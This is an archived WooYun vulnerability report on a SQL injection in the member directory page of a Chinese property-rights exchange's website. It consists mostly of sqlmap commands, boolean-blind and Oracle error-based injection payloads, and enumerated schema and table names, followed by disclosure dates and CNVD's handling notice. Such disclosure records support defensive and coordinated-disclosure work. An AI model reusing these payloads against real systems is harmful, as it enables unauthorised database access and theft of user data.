乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-07: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
南方联合产权交易中心(www.csuaee.com)主要业务包括股权、物权、债权、知识产权等产权交易服务,以及企业资产重组、收购、兼并等产权市场相关业务,是促进产权流动、连接资本进退、优化资源配置的专业化权益性资本市场
sqlmap.py -u "http://**.**.**.**/UserCenter/MemberDirectory.aspx?MemberType=104*"
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/UserCenter/MemberDirectory.aspx?MemberType=104) AND 7317=7317 AND (8601=8601 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: http://**.**.**.**:80/UserCenter/MemberDirectory.aspx?MemberType=104) AND 2573=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2573=2573) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (7856=7856---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'WEB'sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/UserCenter/MemberDirectory.aspx?MemberType=104) AND 7317=7317 AND (8601=8601 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: http://**.**.**.**:80/UserCenter/MemberDirectory.aspx?MemberType=104) AND 2573=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2573=2573) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (7856=7856---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracleavailable databases [30]:[*] APEX_030200[*] APPQOSSYS[*] CMS[*] CMS_GJS[*] CMS_HJS[*] CMS_JT[*] CMS_SS[*] CMS_YP[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WEB[*] WEB_GJS[*] WEB_HJS[*] WEB_JT[*] WEB_SS[*] WEB_YP[*] WMSYS[*] XDB
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/UserCenter/MemberDirectory.aspx?MemberType=104) AND 7317=7317 AND (8601=8601 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: http://**.**.**.**:80/UserCenter/MemberDirectory.aspx?MemberType=104) AND 2573=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(122)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2573=2573) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(98)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (7856=7856---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: OracleDatabase: WEB[48 tables]+---------------------+| MODULE || VIEW || ACCESSSTATICS || AUDITVIEW || CATEGORY || CATEGORYMODEL || COMMENTS || DICT || DICTITEM || FLOWRULE || FLOWRULES || FLOWRULEUSER || FLOWRUN || FLOWRUNS || FLOWUSER || INTENTIONFILL || ITEMAREASTAT || ITEMS || MEMBERINTYPE || MEMBERITEM || MEMBERTYPE || OPERATION || PROPERTYRIGHTNUMBER || QUESTIONNAIRE || RESOURCEAUTHORIZ || ROLE || ROLEGROUP || ROLEOPERATION || SUBSYSTEM || SYSTEMSETTING || TAG || TAGUSE || TEMPTEST || TEST01 || THEORGAN || UPLOADFILES || UPLOADIMAGES || USERGROUP || USERINFO || USERINGROUP || USERLOG || USEROPERATION || USERROLE || USERS || USERSETTING || VOTEOPTION || VOTERECORD || VOTETOPIC |+---------------------+
参数过滤
危害等级:中
漏洞Rank:10
确认时间:2015-10-12 15:47
CNVD确认所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置.
暂无